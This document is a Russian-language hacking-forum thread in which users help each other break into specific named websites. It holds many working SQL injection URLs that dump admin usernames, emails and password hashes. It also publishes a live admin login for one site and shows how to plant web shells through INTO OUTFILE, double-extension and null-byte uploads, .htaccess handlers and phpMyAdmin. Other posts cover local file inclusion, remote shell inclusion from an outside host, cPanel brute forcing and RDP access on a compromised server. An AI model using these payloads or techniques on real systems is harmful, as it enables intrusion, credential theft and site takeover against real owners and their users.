Покажи ссылку.

high_rez said:
Ужасно глупый вопрос.
Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?
В моем браузере отключены скритпы.


Скорее всего - да, но лучше покажи ссылку.

Вот ссылка.

http://www.vishime.ru/news/zhizn-goroda-v-fotografiyah/?page=16

Уж очень сильно хочу попасть в его админку www.vishime.ru/admin/ ))) Вроде как сделан с помощью django framework. Сервер в США, Техас, Apach, Fedora.

Я просто игрался с "?page=%00alert(123)"

И получил от своего браузера предупреждение о XSS.

И еще сразу вопрос, почему при гугл запросе site:vishime.ru filetype: любой, нет ничего? Стоит запрет на отображение, что ли?

AdDa said:
Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).


сканировать, имеется ли страница в наличие, если да то сохранить что она отображает, скрипт хорошо, но есть ли програмка.

nemans said:
сканировать, имеется ли страница в наличие, если да то сохранить что она отображает, скрипт хорошо, но есть ли програмка.


http://nswx.ru/forum/showthread.php?t=8270

Просканировал один хост WVS-ом,он обнаружил SQL-уязвимости следующего вида .


Code:
?category=10' and 1=0&page=2'

Ввожу в браузере - толку ноль.В чем причина ?

возможно просто нет вывода ошибок.

а вообще бросайте эти сканнеры и учитесь сначала искать руками. когда будет опыт, тогда и сканнеры в помощь.

никто не знает урлы онлайн-сканеров директорий сайта

раньше знал пару, но они не пашут уже

93.84.115.243/bans/ban_details.php

Можно че нить раскрутить? а то у меня чето не получается = \

GroM88 said:
93.84.115.243/bans/ban_details.php
Можно че нить раскрутить? а то у меня чето не получается = \


path disclosure если что..

O:\home\93.84.115.243\www\

[-_-]


http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+concat_ws(0x3a,database() ,user(),version())),floor(rand(0)*2))+from+informa tion_schema.tables+group+by+2)bb)




Duplicate entry 'bans:bans1@localhost:5.1.40-community1' for key 'group_key'

ILYAtirtir said:
[-_-]
[-_-]
Цитата:
http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+concat_ws(0x3a,database() ,user(),version())),floor(rand(0)*2))+from+informa tion_schema.tables+group+by+2)bb)


спс

но вот не могу понять почему не выводит nickname i pass при запросе :


http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+,concat_ws(0x3a,username, password)),floor(rand(0)*2))+from+amx_webadmins+gr oup+by+2)bb)

username:admin


http://93.84.115.243/bans/ban_details.php?bid=(select+1+from+(select+count(0 )%20,concat((select+username+from+amx_webadmins+li mit+0,1),floor(rand(0)*2))+from+amx_webadmins+grou p+by+2+limit+1)a)


password:18a6b0764940adcc543fc2b92e564174


http://93.84.115.243/bans/ban_details.php?bid=(select+1+from+(select+count(0 )%20,concat((select+password+from+amx_webadmins+li mit+0,1),floor(rand(0)*2))+from+amx_webadmins+grou p+by+2+limit+1)a)

boxazbox, спасибо.

Такой вопрос.

допустим логин: 'admin' pass(hash): '18a6b0764940adcc543fc2b92e564174' logcode: 'a0dc927eefd71cce9b70e7ccb066130a'

Читая этот топик увидел такую фразу как : "если не удастся найти пароль по хешу, можно составить куку."

/thread121710-amxbans.html

--

Вопрос: как ее правильно составить эту куку?)

GroM88 said:
boxazbox
, спасибо.
Такой вопрос.
допустим логин: 'admin' pass(hash): '18a6b0764940adcc543fc2b92e564174' logcode: 'a0dc927eefd71cce9b70e7ccb066130a'
Читая этот топик увидел такую фразу как : "если не удастся найти пароль по хешу, можно составить куку."
/thread121710-amxbans.html
--
Вопрос: как ее правильно составить эту куку?)



зависит от логики скрипта

durito said:
никто не знает урлы онлайн-сканеров директорий сайта
раньше знал пару, но они не пашут уже


http://scan.0day.in:8080/action/scan

http://defec.ru/scaner/

http://madnet.name/tools/madss/

Есть ли локальный инклуд в этом коде?

И как его использовать?


PHP:
define("modules_dir","data/modules/");

define("template_dir","template/");

// Определяем модуль

$mod_page= empty($_GET['page']) ?$site['start_page'] : (string)$_GET['page'];

// Запрешённые шаблоны для показа

$mods= array('main'=>true,'error'=>true,'quick_error'=>true,'mysql_error'=>true);

if(file_exists(modules_dir.$mod_page.'.php') &&file_exists(template_dir.$mod_page.'.tpl'))

{

includemodules_dir$mod_page.'.php';

}

else

{

if(file_exists(template_dir.$mod_page.'.tp l') and !isset($mods[$mod_page]))

{

$parse->get_tpl(template_dir.$mod_page.'.tpl');

$text=$parse->tpl_view();

}

else

{

$system_error[] ='Непредвиденная ошибка в обработке команды.
Обратитесь к модератору/администратору сайта.';

}

}

Byrger said:
Есть ли локальный инклуд в этом коде?
И как его использовать?

PHP:
define("modules_dir","data/modules/");

define("template_dir","template/");

// Определяем модуль

$mod_page= empty($_GET['page']) ?$site['start_page'] : (string)$_GET['page'];

// Запрешённые шаблоны для показа

$mods= array('main'=>true,'error'=>true,'quick_error'=>true,'mysql_error'=>true);

if(file_exists(modules_dir.$mod_page.'.php') &&file_exists(template_dir.$mod_page.'.tpl'))

{

includemodules_dir$mod_page.'.php';

}

else

{

if(file_exists(template_dir.$mod_page.'.tp l') and !isset($mods[$mod_page]))

{

$parse->get_tpl(template_dir.$mod_page.'.tpl');

$text=$parse->tpl_view();

}

else

{

$system_error[] ='Непредвиденная ошибка в обработке команды.
Обратитесь к модератору/администратору сайта.';

}

}



script.php?page=../../../../../../../../../[LFI]%00

Привет всем. Помогите понять плз

Есть скуля


http://site.net/products/serial.php?serial_id=-1168+union+select+1,2,3,4,username,6,7,8,9+from+us ers--+


в таблице юзеров нужные колонки

username

password

email

Если выводить username без лимита, то на страницу выводятся все 20к юзернэймов (все что есть в бд)

Но если пытаться вывести так же password или email-то в ответ пустая страница. concat(*) таже фигня, как поотдельности так и вместе обьединял, ничего. username отдельно выводится как угодно,все из базы. Но вместе никак.

И по отдельности password или email тоже не выводятся. Только через лимит или group_concat(*)

Думал мож дело в кодировке, пробовал так


AES_DECRYPT(AES_ENCRYPT(concat(username),0x71),0x7 1),6,7,8,9+from+users--+


выводятся.


AES_DECRYPT(AES_ENCRYPT(concat(email *или пасс, с конкатом и без*),0x71),0x71),6,7,8,9+from+users--+


невыводятся


convert(email,binary),6,7,8,9+from+users--+


тоже некатит


convert(email+using+latin1),6,7,8,9+from+users--+


некатит


concat_ws(0x3A3a,table_schema,table_name,column_na me),6,7,8,9+from+information_schema.columns--+


Выводит все таблицы и колонки на страницу, как и юзернэйм. А мыло с пассом нет =(


group_concat(email,0x3a,password),6,7,8,9+from+use rs--+


выводит и мыло и пасс и поотдельности тоже выводит.

И через limit они выводятся.

Но сами по себе нет.

password,6,7,8,9+from+users--+

Через like выводятся

concat_ws(0x3a,email,password),6,7,8,9+from+users+ where+email+like+'a%'--+

но не хочу весь алфавит перебирать =)

Можно ли как то вывести ВСЕ мыла и пассы. Возможно по какому то общему критерию, который есть в каждой записи...хз. Может скажем в условии можно сделать вывод всех мыл и пассов, у которых колонка id не пустая.

Очень буду благодарен если обьясните.

Подскажите пожалуйста как в картинку засунуть свой php-код? Ну мне нужно проинклудить картинку вобщем.

iget said:
Подскажите пожалуйста как в картинку засунуть свой php-код? Ну мне нужно проинклудить картинку вобщем.


Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные.

В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.

Redwood said:
Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные.
В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.


тогда картинка перестает быть картинкой и не загружается на сайт

iget said:
тогда картинка перестает быть картинкой и не загружается на сайт


а просто шелл с двойным расширением залить не пробывал?

iget said:
тогда картинка перестает быть картинкой и не загружается на сайт



Если ты делал как тебе сказали через хекс редактор, то картинка остаётся картинкой. скорее всего ты даже не попробовал так делать.

http://dump.ru/file/4831477

вот тебе для теста пхпинфо. Пробуй заливать и инклудить.

Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос

Есть скуля, ветка 5.1.43

В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом)

-1404+union+select+concat(database(),0x3A,version() ),2+from+information_schema.tables--+

-1404+union+select+concat(column_name,0x3A,table_na me),2+from+information_schema.columns--+

Если просто

-1404+union+select+concat(database(),0x3A,version() ),2--+

Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from?

В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)

auth_root said:
Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос
Есть скуля, ветка 5.1.43
В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом)
-1404+union+select+concat(database(),0x3A,version() ),2+from+information_schema.tables--+
-1404+union+select+concat(column_name,0x3A,table_na me),2+from+information_schema.columns--+
Если просто
-1404+union+select+concat(database(),0x3A,version() ),2--+
Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from?
В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)


хз что может быть... давай сылку в пм.

Еще кто нибудь объясните, если в поле Логин я ввожу '';!--"=&{()}, и потом просматириваю код страницы, и нахожу что то типа

Всем привет,

Есть ли у кого эксплоит этой баги:

http://developer.joomla.org/security/news/9-security/10-core-security/315-20100701-core-sql-injection-internal-path-exposure.html

Буду очень благодарен!!

PHP:
SELECT username FROM users ORDER BY username[URL]

Is it possible to inject this? I know it is not possible to do union all select.

site.php?orderby=ASC gives ascending and orderby=DESC gives descending.

site.php?orderby=,password gives same as ASC

site.php?orderby=limit 0,1 gives only first username.

site.php?orderby=ASC, 1 gives true (everything ok on site)

site.php?orderby=ASC, 0 gives false (content missing)

orderby=ASC, 1=2 gives true (wtf?)

Any help or way to inject this? Sorry for not speaking Russian!

Malygos said:

PHP:
SELECT username FROM users ORDER BY username[URL]

Is it possible to inject this? I know it is not possible to do union all select.
site.php?orderby=ASC gives ascending and orderby=DESC gives descending.
site.php?orderby=,password gives same as ASC
site.php?orderby=limit 0,1 gives only first username.
site.php?orderby=ASC, 1 gives true (everything ok on site)
site.php?orderby=ASC, 0 gives false (content missing)
orderby=ASC, 1=2 gives true (wtf?)
Any help or way to inject this? Sorry for not speaking Russian!


http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/

Malygos said:

PHP:
SELECT username FROM users ORDER BY username[URL]

Is it possible to inject this? I know it is not possible to do union all select.
site.php?orderby=ASC gives ascending and orderby=DESC gives descending.
site.php?orderby=,password gives same as ASC
site.php?orderby=limit 0,1 gives only first username.
site.php?orderby=ASC, 1 gives true (everything ok on site)
site.php?orderby=ASC, 0 gives false (content missing)
orderby=ASC, 1=2 gives true (wtf?)
Any help or way to inject this? Sorry for not speaking Russian!


Example, we have mysql5.


select username from users order by username
*(IF(ASCII(SUBSTRING(VERSION(),1,1))=53,1,-1))
1 user
2 user
3 user
4 user
select username from users order by username
*(IF(ASCII(SUBSTRING(VERSION(),1,1))=52,1,-1))
4 user
3 user
2 user
1 user




Code:
Exploit:

site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VE RSION%28%29%2C1%2C1%29%29%3D53%2C1%2C-1%29%29%0D%0A -> true

site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VE RSION%28%29%2C1%2C1%29%29%3D52%2C1%2C-1%29%29 -> false

есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?

:."]
.:[melkiy]:. said:
есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?


там мой пост (https://antichat.live/showthread.php/p/2351868/)

в консоли команды прописываеш, а потом mstsc.

Помогите раскрутить найденную уязвимость=)

http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%20666 1,%28select%20group_concat%28column_name%29%20from %20information_schema.columns%20where%20table_name %20=%200x61646d696e5f74626c%29,6663,6664,6665%20fr om%20admin_tbl--+

админку найте не могу...

//здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость

S-J said:
Помогите раскрутить найденную уязвимость=)


http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl

d1v said:
http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl


Спасибо ещё бы админку)

есть mssql inj

структура таблицы:


[Allmembers
ostCode]
[Allmembers:Telephone]
[Allmembers:EnquiryDate]
[Allmembers:GenderCode]
[Allmembers:LastMailShotDate]
[Allmembers:StatusID]
[Allmembers:ContactMeans]
[Allmembers:County]
[Allmembers:BoxNo]
[Allmembers:E-mail]
[Allmembers:showemail]
[Allmembers:NickName]
[Allmembers
ateOfBirth]


не получается вывести инфо из нее - на все запросы выдает:

Invalid column name 'E-mail'.

как обойти?

и еще вопрос - как узнать количество записеи в табле?

S-J said:
Спасибо ещё бы админку)


cpanel.thegotomom.com

webdisk.thegotomom.com

j0ker13 said:
есть mssql inj
структура таблицы:
не получается вывести инфо из нее - на все запросы выдает:
Invalid column name 'E-mail'.
как обойти?
и еще вопрос - как узнать количество записеи в табле?


Шифруй слово "email" в HEX или CHAR

Gemini12 said:
Шифруй слово "email" в HEX или CHAR


Вот скажи мне, зачем?

дело не в этом.

даже при запросе


select StatusID from Allmembers


выдает


Invalid column name 'E-mail

Всем привет,

Нашел sql-inj, но не получается раскрутить:

http://parus-grad.com.ua/SearchResult.html?ot=1'

запросы типа

http://parus-grad.com.ua/SearchResult.html?ot=(select+test) нормально проходят, но получить структуру таблиц в базе не получается. ругается то на 'TOP' то на 'FROM'

Подскажите как добраться до списка таблиц на примере, а дальше я уже сам поковыряю. Спасибо!

может у меня кривые руки, помогите создать запрос http://www.globalwinn.ro/index.php?lang=-English&page=mlm-tomorow

Получил печеньки с xss уявимости, а там больше параметров чем при простом посещении сайта, подставляю только те что есть - не работает, создаю новые, которых нет, но которые пришли от чувака - не работает, что делать? что не так?

F яjHost 'тут айпи нашего админа' is not allowed to connect to this MySQL server

что это такое что написано выше?это у меня появилось когда я сканировал свой серв на порты и серв мне дал скачать это тхт файл!(я/ знаю что админ управляет удаленно сервом!)

dupD0M said:
F яjHost 'тут айпи нашего админа' is not allowed to connect to this MySQL server
что это такое что написано выше?это у меня появилось когда я сканировал свой серв на порты и серв мне дал скачать это тхт файл!(я/ знаю что админ управляет удаленно сервом!)



этот Ip не имеет прав на подключение к mysql серверу

попугай said:
этот Ip не имеет прав на подключение к mysql серверу


получается это на мой айпи написано а там где я отметил "айпи админа"говорит о том что ток он имеет право на управление сервером?

dupD0M said:
о том что ток он имеет право на управление сервером?


Да.

Всем привет!

Как лучше составить запрос, что бы избавиться от ошибки "..more 1 rowe.." (дословно не помню)

запрос такой:


Code:
' or (select count(*) from information_schema.tables group by concat((select group_concat(table_name) from information_schema.tables limit 0,1),floor(rand(0)*2)))/*

-----------------------------------------------------------------------------------

хочу внести некоторое дополнение:

Redwood, спасибо, но я хочу использовать group_concat, т.к. после 3-х запросов блочится IP... так сказать, нужно сократить количество запросов.

Как избежать ошибки

Subquery returns more than 1 row

при использовании group_concat в запросе выше.

IMMORTAL_S said:
Всем привет!
Как лучше составить запрос, что бы избавиться от ошибки "..more 1 rowe.." (дословно не помню)
запрос такой:

Code:
' or (select count(*) from information_schema.tables group by concat((select group_concat(0x3a,table_name) from information_schema.tables limit 0,1),floor(rand(0)*2)))/*



999'+or+(select+count(*)+from+information_schema.t ables+group+by+concat((select+table_name+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) )--+

Помогите раскрутить http://parus-grad.com.ua/SearchResult.html?ot=(select+test)

Хм.. при таком запросе,


Code:
1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/*

тоже выдает

Subquery returns more than 1 row

С чем это может быть связано? ..таблица configuration единственная.

Помогите найти админку

http://www.zembank.ru/

В ПМ пожалуйста

Access denied for user 'u1001104_spark'@'%' to database 'information_schema'


takoe mozhet byt'?

j0ker13 said:
takoe mozhet byt'?


а что в этом не понятного? нету прав на information_schema

подскажите, тут просто ошибка mysql или можно что-то выкружить:

http://jmatch.com/member/profile.php?profile_id=21295740'

Заливаю шелл


PHP:
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+ou tfile+%271.php%27



-- и никак не могу найти его ))

Путь нужно указывать абсолютный. Папка, в которую пишешь, должна быть доступна для записи.

Спасибо буду думать как мне путь узнать

0pTik said:
Спасибо буду думать как мне путь узнать


Раз file_priv есть, то ищи конфиг апача. Там будет полный путь до твоего ресурса.

0pTik said:
Заливаю шелл

PHP:
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+ou tfile+%271.php%27



-- и никак не могу найти его ))


http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/var/log/apache2/error_log'),3,4,5

http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/httpd.conf'),3,4,5

http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/default-server.conf'),3,4,5

Везде сказано про /srv/www/htdocs/ , пробовал подставлять не пишет (

hxxp://www.enzymedica.com/locator/results_list.php?zip=1' помогите расскрутить чучуть. а то не могу чето лимит =\

GroM88 said:
hxxp://www.enzymedica.com/locator/results_list.php?zip=1' помогите расскрутить чучуть. а то не могу чето лимит =\


http://www.enzymedica.com/locator/results_list.php?zip=-1%27+union+select+1,version%28%29,user%28%29,datab ase%28%29,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5+--+

admins

name:emailassword

[0]:KimJackson:kimjackson@enzymedica.com:c4666c6c7871 92575aded2c73d27278a

[1]:Enzymedicarders@enzymedica.com:655ef9fec684d34335 1ee72dbeb95dd6

[2]:Kim Barton:kim@enzymedica.com:655ef9fec684d343351ee72d beb95dd6

[3]:Admin Arearder@enzymedica.com:e69dc2c09e8da6259422d987cc be95b5

[4]:cornerstone:julianna@cornerstone1.com:f326e2c3453 cf64cdb979e1c8d53293d

[5]:WebTent:support@webtent.com:e1197bbf2f07992aa7936 c49d3b41319

Gorev спасибо.

Тут вот другой вопрос возник

при запросе :

http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+infor mation_schema.tables+--+

Мне выдает какую то будылыгу = \

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

При таком запросе:

http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,table_name,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5+from+information_schema.table s+limit+0,1+--+

Странно. Мб кто нибудь знает почему не выводит названия таблиц?

GroM88 said:
Gorev
спасибо.
Тут вот другой вопрос возник
при запросе :
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+infor mation_schema.tables+--+
Мне выдает какую то будылыгу = \
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
При таком запросе:
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,table_name,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5+from+information_schema.table s+limit+0,1+--+
Странно. Мб кто нибудь знает почему не выводит названия таблиц?


http://www.enzymedica.com/locator/results_list.php?zip=1%27+UNION+SELECT+1,AES_DECRY PT%28AES_ENCRYPT%28CONCAT%28%28SELECT+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1%29%29,0x71 %29,0x71%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25--%20+

0pTik said:
Везде сказано про /srv/www/htdocs/ , пробовал подставлять не пишет (


А какую инъекцию составляешь?

Вот так не работает?



http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,%27%27,3,4,5+from+mysql.u ser+into+outfile+%27/srv/www/htdocs/php/newdesign/nacional/1.php%27

И шелл должен быть тут

http://www.eurotur.com.ar/php/newdesign/nacional/1.php

Если нет, то скорей всего папка недоступна на запись. Попробуй найти другую.

http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+i nformation_schema./*!tables*/+--+

И вообще..


union+select+1,group_concat(0x3a,table_name),5


где столбцы 3,4 потерял? =)

mr.celt said:
А какую инъекцию составляешь?
Вот так не работает?


http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+and+1=0+Union+Select+1,%27%27,3,4,5+from+mysql.u ser+into+outfile+%27/srv/www/htdocs/php/newdesign/nacional/1.php%27
И шелл должен быть тут
http://www.eurotur.com.ar/php/newdesign/nacional/1.php
Если нет, то скорей всего папка недоступна на запись. Попробуй найти другую.


Да не доступна

Всем огромный респект за помощь со скулей)

тут другой вопрос пожоще = )

как залить шел?)

Есть полный доступ к админке)

https://enzymedica.com/admin/

login: order@enzymedica.com

pass: asdqwe123

В админке я нашол только залитие картинок = ) php не пропускает = \

очень нужно взять пару php файлов оттуда = \

0pTik said:
Да не доступна


Попробуй в эти папки записать:

/html/images/

/php/

/php/newdesign/receptivo/

/php/newdesign/receptivo/ingles/

/manual/ - тут можешь визуально посмотреть

/html/

GroM88 said:
Всем огромный респект за помощь со скулей)
тут другой вопрос пожоще = )
как залить шел?)
Есть полный доступ к админке)
https://enzymedica.com/admin/
login: order@enzymedica.com
pass: asdqwe123
В админке я нашол только залитие картинок = ) php не пропускает = \
очень нужно взять пару php файлов оттуда = \


Фильтрация идет по расширению или по содержимому?

Если по расширению, попробуй так wso.php3, wso.php5, wso.phtml и т.д.

Если по содержимому, то попробуй в gif-картинку дописать шелл.

mr.celt said:
Попробуй в эти папки записать:
/html/images/
/php/
/php/newdesign/receptivo/
/php/newdesign/receptivo/ingles/
/manual/ - тут можешь визуально посмотреть
/html/


Эх никуда не пишет((

Мб у кого нить есть уже зделаная картинка с шелом? :j

GroM88 said:
Мб у кого нить есть уже зделаная картинка с шелом? :j


Нажимаешь ПКМ > переименовать > .gif > картинка шелл.

-PRIVAT- said:
Нажимаешь ПКМ > переименовать > .gif > картинка шелл.


Да не) это я уже пробовал) не заливает = \

GroM88 said:
Мб у кого нить есть уже зделаная картинка с шелом? :j


3 года на форуме...мдяс.....не стыдно такие вопросы задавать?

Gorev said:
3 года на форуме...мдяс.....не стыдно такие вопросы задавать?


Да это я регнулся 3 года назад) а посещать его начал недавно : ))

P.S. Скинь запрос как ты выводил названия колонок из таблиц плз : ))

Есть скуля, таблицы можно выводить только по одной, через limit. Как можно вывести сразу все таблицы?

GroM88 said:
Да не) это я уже пробовал) не заливает = \


Пробуй подменить Content-Type.

Оффтоп: Вам не надоело задавать однообразные вопросы? Все ответы на них, есть в этой ветке, нужно только воспользоваться поиском.

Mirrey said:
Есть скуля, таблицы можно выводить только по одной, через limit. Как можно вывести сразу все таблицы?


Ты скулю то покажи : O

Mirrey said:
Есть скуля, таблицы можно выводить только по одной, через limit. Как можно вывести сразу все таблицы?


Вот, не так давно выкладывал скрипт, дампит таблицы через limit в ошибке (MySQL 4.1>=)

/showthread.php?p=2352621#post2352621

Заточить под себя не сложно.

Пробуй подменить Content-Type.


Всмысле подменить?) где именно?)

Если можеш, обьясни плз подробнее.

GroM88 said:
Всмысле подменить?) где именно?)
Если можеш, обьясни плз подробнее.


/showthread.php?p=2344055#post2344055

всем привет у менеа ести маленкая проблема, саит такои _quanttest.ro, ести доступ к cpanel и через ftp, тут все панятно, но у саита ести 2-я части, если залогинится пасылают вас на саит >>> network.quanttest.ro, из cpanel доступa к нему нету (из ошиблки видно што он находитця в другой директорие на серваке /home/fnet а другои в папке /home/qt) мне к нему надобы подобратсеа. sql ести но запрос я подобрати не как не магу.


http://network.quanttest.ro/index.php?target=distributorSearch&select=-id&searchval=ROU000003001




Unknown column 'privatedata.-id' in 'where clause'


отпешитеси y каво какие идеи ести.

еа писал на форуме но, ребеата вличку не отзиваиутсеа, админи стеорли мои пост... , наверное сылаияси на то что я занимаиуси смапамам или из за отсуствие постов.

PS shh не фурычит, залил phpshell, начил искати подход к root, exploit на linux 2.6.18, apache 2.2.16 но безрезультатно.

PSS на даном моменте работает брут на для спанел на базе perl, но результат мало вероятнии пароли 13-и значние, всеотаки админ не полнии ламер

Народ, помогите с http://parus-grad.com.ua/SearchResult.html?ot=(select+test) плиз. Как добраться до списка таблиц?

Вообщем получилось залить шелл вот так shell.php.jpg

Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O

---------

https://www.enzymedica.com/images/products/39_win4.php.gif

https://www.enzymedica.com/images/products/39_win4.php.swf

https://www.enzymedica.com/images/products/39_win2.php%2500.jpg

help

GroM88 said:
Вообщем получилось залить шелл вот так shell.php.jpg
Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O
---------
https://www.enzymedica.com/images/products/39_win4.php.gif
https://www.enzymedica.com/images/products/39_win4.php.swf
https://www.enzymedica.com/images/products/39_win2.php%2500.jpg
help


а ты чего ожидал? у тебя конечный формат-картинка

такое прокатит очень редко, если хтаксесс настроенo неправильно

GroM88 said:
Вообщем получилось залить шелл вот так shell.php.jpg
Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O
---------
https://www.enzymedica.com/images/products/39_win4.php.gif
https://www.enzymedica.com/images/products/39_win4.php.swf
https://www.enzymedica.com/images/products/39_win2.php%2500.jpg
help


Ищи инклуд и инклудь шелл.

Пытайся залить свой .htaccess и пропиши исполнение jpg файлов (AddHandler application/x-httpd-php .jpg)

Если файл проходит через функцию copy(), при заливке прокатит нулл байт (shell.php%00.jpg), расширение обрежется и ты получишь полноценный шелл.

П.С. Ты будешь теперь каждое действие спрашивать? Проще было написать, я ничего не знаю, дайте мне ссылку на залитый шелл.

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`testing` (`shell`) VALUES ('<? include 'http://goomihas.narod.ru/testing.php' ?' at line 1


что за шляпа???шелл литься не хочет

p.s какие есть способы залития шелла в phpmyadmin?????

и что можно сделать имея доступ в phpmyadmin?

KENT1994 said:
что за шляпа???шелл литься не хочет
p.s какие есть способы залития шелла в phpmyadmin?????
и что можно сделать имея доступ в phpmyadmin?


CREATE DATABASE `shell_upload`;

CREATE TABLE `hack` (`shell` TEXT);

INSERT INTO `hack` (`shell`) VALUES ('');

Ищем папку с правами на запись и делаем запрос

SELECT `shell` FROM `hack` INTO OUTFILE '/path/shell.php';

Либо можно инклудить шелл с сервера.

INSERT INTO `hack` (`shell`) VALUES ("");

Для этого способа, директива allow_url_include должна находиться в положении On.

Для этого способа, директива allow_url_include должна находиться в положении On


где ее найти?? и можно ли ее включить?

KENT1994 said:
где ее найти??
и можно ли ее включить?


Найти ее можно вызвав phpinfo или посмотреть в файле php.ini

А чем тебя первый способ не устроил?

вроде залил , но теперь хз где искать

сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");

где теперь найти на сайте этот шелл(

KENT1994 said:
вроде залил , но теперь хз где
искать
сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("");
где теперь найти на сайте этот шелл(


Когда льешь через into outfile, ты должен указать абсолютный путь до папки с правами на запись, там и ищи.

Лучше лей через eval, так как allow_url_include, достаточно редко бывает в положении On.

SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?

я просто хз как найти папку для залива файлов шел во 2й раз заливаю

KENT1994 said:
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?


Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так.

А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так.

У тебя вообще права есть на чтение и запись файлов?

Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил.

Сделай запрос в phpmyadmin


HTML:
SELECT user() FROM mysql.user

выдаст тебе юзера, под которым работает БД

Потом сделай запрос


HTML:
SELECT file_priv FROM mysql.user WHERE user = 'имя юзера'

